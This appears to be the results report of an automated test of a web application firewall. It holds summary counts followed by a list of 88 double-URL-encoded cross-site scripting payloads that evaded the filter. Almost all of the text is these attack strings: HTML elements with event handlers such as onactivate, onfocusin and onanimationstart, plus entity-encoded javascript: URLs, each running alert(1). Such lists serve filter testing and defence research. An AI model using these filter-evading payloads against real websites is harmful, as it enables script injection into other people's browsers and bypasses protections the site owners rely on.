================================================================================
File: double_url_encode.txt - Summary
================================================================================
Total Tested: 7373
Bypassed: 88
Blocked: 7285
Bypass Rate: 1.19%
================================================================================

BYPASSED PAYLOADS:
--------------------------------------------------------------------------------

%253Carticle%2520id%253Dx%2520tabindex%253D1%2520onbeforedeactivate%253Dalert%25281%2529%253E%253C%252Farticle%253E%253Cinput%2520autofocus%253E
%253Cabbr%2520id%253Dx%2520tabindex%253D1%2520ondeactivate%253Dalert%25281%2529%253E%253C%252Fabbr%253E%253Cinput%2520id%253Dy%2520autofocus%253E
%253Csvg%253E%253Cblockquote%2520onload%253Dalert%25281%2529%253E%253C%252Fblockquote%253E
%2522%253Cstyle%253E%2540keyframes%2520x%257B%257D%253C%252Fstyle%253E%253Cmain%2520style%253D%2522%2522animation-name%253Ax%2522%2522%2520onanimationend%253D%2522%2522alert%25281%2529%2522%2522%253E%253C%252Fmain%253E%2522
%253Csvg%253E%253Coption%2520onload%253Dalert%25281%2529%253E%253C%252Foption%253E
%253Cli%2520id%253Dx%2520tabindex%253D1%2520onbeforeactivate%253Dalert%25281%2529%253E%253C%252Fli%253E
%2522%253Cmenuitem%2520onkeyup%253D%2522%2522alert%25281%2529%2522%2522%2520contenteditable%253Etest%253C%252Fmenuitem%253E%2522
%253Cslot%2520onpointerenter%253Dalert%25281%2529%253EXSS%253C%252Fslot%253E
%253Cslot%2520id%253Dx%2520tabindex%253D1%2520onfocusin%253Dalert%25281%2529%253E%253C%252Fslot%253E
%253Cnobr%2520id%253Dx%2520tabindex%253D1%2520ondeactivate%253Dalert%25281%2529%253E%253C%252Fnobr%253E%253Cinput%2520id%253Dy%2520autofocus%253E
%253Crb%2520id%253Dx%2520tabindex%253D1%2520onbeforeactivate%253Dalert%25281%2529%253E%253C%252Frb%253E
%2522%253Cstyle%253E%253Atarget%2520%257Btransform%253A%2520rotate%2528180deg%2529%253B%257D%253C%252Fstyle%253E%253Cvar%2520id%253Dx%2520style%253D%2522%2522transition%253Atransform%25202s%2522%2522%2520ontransitionrun%253Dalert%25281%2529%253E%253C%252Fvar%253E%2522
%253Carea%2520id%253Dx%2520tabindex%253D1%2520ondeactivate%253Dalert%25281%2529%253E%253C%252Farea%253E%253Cinput%2520id%253Dy%2520autofocus%253E
%2522%253Cmain%2520draggable%253D%2522%2522true%2522%2522%2520ondragstart%253D%2522%2522alert%25281%2529%2522%2522%253Etest%253C%252Fmain%253E%2522
%253Crtc%2520id%253Dx%2520tabindex%253D1%2520onactivate%253Dalert%25281%2529%253E%253C%252Frtc%253E
%253Cdl%2520id%253Dx%2520tabindex%253D1%2520onbeforedeactivate%253Dalert%25281%2529%253E%253C%252Fdl%253E%253Cinput%2520autofocus%253E
%253Cul%2520id%253Dx%2520tabindex%253D1%2520onbeforeactivate%253Dalert%25281%2529%253E%253C%252Ful%253E
%253Chtml%2520id%253Dx%2520tabindex%253D1%2520ondeactivate%253Dalert%25281%2529%253E%253C%252Fhtml%253E%253Cinput%2520id%253Dy%2520autofocus%253E
%253Ccenter%2520onpointerenter%253Dalert%25281%2529%253EXSS%253C%252Fcenter%253E
%253Csvg%253E%253Cbutton%2520onload%253Dalert%25281%2529%253E%253C%252Fbutton%253E
%253Ccode%2520id%253Dx%2520tabindex%253D1%2520onactivate%253Dalert%25281%2529%253E%253C%252Fcode%253E
%253Ctextarea%2520id%253Dx%2520tabindex%253D1%2520onactivate%253Dalert%25281%2529%253E%253C%252Ftextarea%253E
%2522%253Cstyle%253E%2540keyframes%2520slidein%2520%257B%257D%253C%252Fstyle%253E%253Crb%2520style%253D%2522%2522animation-duration%253A1s%253Banimation-name%253Aslidein%253Banimation-iteration-count%253A2%2522%2522%2520onanimationiteration%253D%2522%2522alert%25281%2529%2522%2522%253E%253C%252Frb%253E%2522
%2522echo%2528%2527IPT%253Ealert%2528%2522%2522%2522%2522%2529%253C%252FSCRIPT%253E%2527%2529%2522
%2522%253Cins%2520onmousemove%253D%2522%2522alert%25281%2529%2522%2522%253Etest%253C%252Fins%253E%2522
%253Crp%2520id%253Dx%2520tabindex%253D1%2520onactivate%253Dalert%25281%2529%253E%253C%252Frp%253E
%253Chtml%2520id%253Dx%2520tabindex%253D1%2520onbeforeactivate%253Dalert%25281%2529%253E%253C%252Fhtml%253E
%253Ccontent%2520id%253Dx%2520tabindex%253D1%2520onactivate%253Dalert%25281%2529%253E%253C%252Fcontent%253E
%253Cdt%2520id%253Dx%2520tabindex%253D1%2520onactivate%253Dalert%25281%2529%253E%253C%252Fdt%253E
%253Ccode%2520id%253Dx%2520tabindex%253D1%2520onbeforeactivate%253Dalert%25281%2529%253E%253C%252Fcode%253E
%2522%253Csource%2520onpaste%253D%2522%2522alert%25281%2529%2522%2522%2520contenteditable%253Etest%253C%252Fsource%253E%2522
%2522%253Cdfn%2520draggable%253D%2522%2522true%2522%2522%2520ondragleave%253D%2522%2522alert%25281%2529%2522%2522%253Etest%253C%252Fdfn%253E%2522
%253Coptgroup%2520onpointerdown%253Dalert%25281%2529%253EXSS%253C%252Foptgroup%253E
%2522%253Ccenter%2520draggable%253D%2522%2522true%2522%2522%2520ondragstart%253D%2522%2522alert%25281%2529%2522%2522%253Etest%253C%252Fcenter%253E%2522
%253Coptgroup%2520id%253Dx%2520tabindex%253D1%2520onbeforeactivate%253Dalert%25281%2529%253E%253C%252Foptgroup%253E
%253Crb%2520onpointerout%253Dalert%25281%2529%253EXSS%253C%252Frb%253E
%253Cblink%2520onpointerup%253Dalert%25281%2529%253EXSS%253C%252Fblink%253E
%253Clegend%2520id%253Dx%2520tabindex%253D1%2520onactivate%253Dalert%25281%2529%253E%253C%252Flegend%253E
%253Cbr%2520id%253Dx%2520tabindex%253D1%2520onbeforeactivate%253Dalert%25281%2529%253E%253C%252Fbr%253E
%2522d%253D%2522%2522alert%2528%2527%2527%2529%253B%255C%2522%2522%2529%2522%2522%253B%2520%2522
%253Cnoscript%2520id%253Dx%2520tabindex%253D1%2520onbeforeactivate%253Dalert%25281%2529%253E%253C%252Fnoscript%253E
%253Ctfoot%2520id%253Dx%2520tabindex%253D1%2520onactivate%253Dalert%25281%2529%253E%253C%252Ftfoot%253E
%253Ctbody%2520onpointerenter%253Dalert%25281%2529%253EXSS%253C%252Ftbody%253E
%253Col%2520id%253Dx%2520tabindex%253D1%2520onactivate%253Dalert%25281%2529%253E%253C%252Fol%253E
%253Csup%2520onpointerup%253Dalert%25281%2529%253EXSS%253C%252Fsup%253E
%253Ctextarea%2520id%253Dx%2520tabindex%253D1%2520onbeforedeactivate%253Dalert%25281%2529%253E%253C%252Ftextarea%253E%253Cinput%2520autofocus%253E
%2522%253Crt%2520onmouseleave%253D%2522%2522alert%25281%2529%2522%2522%253Etest%253C%252Frt%253E%2522
%2526%2523X000003C%253B
%253Cul%2520id%253Dx%2520tabindex%253D1%2520ondeactivate%253Dalert%25281%2529%253E%253C%252Ful%253E%253Cinput%2520id%253Dy%2520autofocus%253E
%2522%253Crb%2520onpaste%253D%2522%2522alert%25281%2529%2522%2522%2520contenteditable%253Etest%253C%252Frb%253E%2522
%253Crb%2520onpointerup%253Dalert%25281%2529%253EXSS%253C%252Frb%253E
%2522%253Cnextid%2520draggable%253D%2522%2522true%2522%2522%2520ondragenter%253D%2522%2522alert%25281%2529%2522%2522%253Etest%253C%252Fnextid%253E%2522
%253CIMG%2520SRC%253D%2526%2523106%253B%2526%252397%253B%2526%2523118%253B%2526%252397%253B%2526%2523115%253B%2526%252399%253B%2526%2523114%253B%2526%2523105%253B%2526%2523112%253B%2526%2523116%253B%2526%252358%253B%2526%252397%253B%2526%2523108%253B%2526%2523101%253B%2526%2523114%253B%2526%2523116%253B%2526%252340%253B%2526%252339%253B%2526%252388%253B%2526%252383%253B%2526%252383%253B%2526%252339%253B%2526%252341%253B%253E
%2522%253Cnextid%2520onmouseenter%253D%2522%2522alert%25281%2529%2522%2522%253Etest%253C%252Fnextid%253E%2522
%2522%253Crtc%2520onbeforecopy%253D%2522%2522alert%25281%2529%2522%2522%2520contenteditable%253Etest%253C%252Frtc%253E%2522
%2522%253Ccite%2520onbeforecopy%253D%2522%2522alert%25281%2529%2522%2522%2520contenteditable%253Etest%253C%252Fcite%253E%2522
%2522%253Cstyle%253E%2540keyframes%2520x%257B%257D%253C%252Fstyle%253E%253Caddress%2520style%253D%2522%2522animation-name%253Ax%2522%2522%2520onanimationstart%253D%2522%2522alert%25281%2529%2522%2522%253E%253C%252Faddress%253E%2522
%2522%253CSTYLE%2520type%253D%2522%2522text%252Fcss%2522%2522%253EBODY%257Bbackground%253Aurl%2528%2522%2522javascript%253Aalert%2528%2527%2527%2529%2522%2522%2529%257D%253C%252FSTYLE%253E%2522
%253Csvg%253E%253Crb%2520onload%253Dalert%25281%2529%253E%253C%252Frb%253E
%253Cbdi%2520id%253Dx%2520tabindex%253D1%2520ondeactivate%253Dalert%25281%2529%253E%253C%252Fbdi%253E%253Cinput%2520id%253Dy%2520autofocus%253E
%253Cstyle%2520onblur%253Dalert%25281%2529%2520tabindex%253D1%2520id%253Dx%253E%253C%252Fstyle%253E%253Cinput%2520autofocus%253E
%253Cins%2520id%253Dx%2520tabindex%253D1%2520onfocusin%253Dalert%25281%2529%253E%253C%252Fins%253E
%253Cth%2520id%253Dx%2520tabindex%253D1%2520onfocusin%253Dalert%25281%2529%253E%253C%252Fth%253E
%253Cform%2520id%253Dx%2520tabindex%253D1%2520ondeactivate%253Dalert%25281%2529%253E%253C%252Fform%253E%253Cinput%2520id%253Dy%2520autofocus%253E
%2522%253Cmenuitem%2520ondblclick%253D%2522%2522alert%25281%2529%2522%2522%253Etest%253C%252Fmenuitem%253E%2522
%253Cwbr%2520id%253Dx%2520tabindex%253D1%2520onfocusin%253Dalert%25281%2529%253E%253C%252Fwbr%253E
%253Cwbr%2520onpointerout%253Dalert%25281%2529%253EXSS%253C%252Fwbr%253E
%2522%253Cstyle%253E%2540keyframes%2520x%257B%257D%253C%252Fstyle%253E%253Ccite%2520style%253D%2522%2522animation-name%253Ax%2522%2522%2520onanimationstart%253D%2522%2522alert%25281%2529%2522%2522%253E%253C%252Fcite%253E%2522
%253Ccite%2520onpointerup%253Dalert%25281%2529%253EXSS%253C%252Fcite%253E
%253Cblockquote%2520id%253Dx%2520tabindex%253D1%2520onbeforeactivate%253Dalert%25281%2529%253E%253C%252Fblockquote%253E
%253Ctbody%2520onpointerup%253Dalert%25281%2529%253EXSS%253C%252Ftbody%253E
%253Ccontent%2520onpointerup%253Dalert%25281%2529%253EXSS%253C%252Fcontent%253E
%253Cframe%2520id%253Dx%2520tabindex%253D1%2520onbeforedeactivate%253Dalert%25281%2529%253E%253C%252Fframe%253E%253Cinput%2520autofocus%253E
%2522%253Cprogress%2520oncontextmenu%253D%2522%2522alert%25281%2529%2522%2522%253Etest%253C%252Fprogress%253E%2522
%253Cdfn%2520id%253Dx%2520tabindex%253D1%2520onfocusin%253Dalert%25281%2529%253E%253C%252Fdfn%253E
%253Clink%2520id%253Dx%2520tabindex%253D1%2520ondeactivate%253Dalert%25281%2529%253E%253C%252Flink%253E%253Cinput%2520id%253Dy%2520autofocus%253E
%253Cdialog%2520id%253Dx%2520tabindex%253D1%2520onfocus%253Dalert%25281%2529%253E%253C%252Fdialog%253E
%2522%253Ctfoot%2520onmouseout%253D%2522%2522alert%25281%2529%2522%2522%253Etest%253C%252Ftfoot%253E%2522
%253Cbody%2520id%253Dx%2520tabindex%253D1%2520ondeactivate%253Dalert%25281%2529%253E%253C%252Fbody%253E%253Cinput%2520id%253Dy%2520autofocus%253E
%253Cdfn%2520id%253Dx%2520tabindex%253D1%2520ondeactivate%253Dalert%25281%2529%253E%253C%252Fdfn%253E%253Cinput%2520id%253Dy%2520autofocus%253E
%2522%253Cstyle%253E%253Atarget%2520%257Btransform%253A%2520rotate%2528180deg%2529%253B%257D%253C%252Fstyle%253E%253Ctt%2520id%253Dx%2520style%253D%2522%2522transition%253Atransform%25202s%2522%2522%2520ontransitionrun%253Dalert%25281%2529%253E%253C%252Ftt%253E%2522
%2522%253Cpicture%2520draggable%253D%2522%2522true%2522%2522%2520ondragenter%253D%2522%2522alert%25281%2529%2522%2522%253Etest%253C%252Fpicture%253E%2522
%253Ccolgroup%2520id%253Dx%2520tabindex%253D1%2520onbeforeactivate%253Dalert%25281%2529%253E%253C%252Fcolgroup%253E
%253Cdl%2520onblur%253Dalert%25281%2529%2520tabindex%253D1%2520id%253Dx%253E%253C%252Fdl%253E%253Cinput%2520autofocus%253E
%253Cbig%2520onblur%253Dalert%25281%2529%2520tabindex%253D1%2520id%253Dx%253E%253C%252Fbig%253E%253Cinput%2520autofocus%253E
%253Cstrong%2520id%253Dx%2520tabindex%253D1%2520onbeforeactivate%253Dalert%25281%2529%253E%253C%252Fstrong%253E
%2522%253Crtc%2520onbeforecut%253D%2522%2522alert%25281%2529%2522%2522%2520contenteditable%253Etest%253C%252Frtc%253E%2522
%253Ch1%2520id%253Dx%2520tabindex%253D1%2520onbeforeactivate%253Dalert%25281%2529%253E%253C%252Fh1%253E
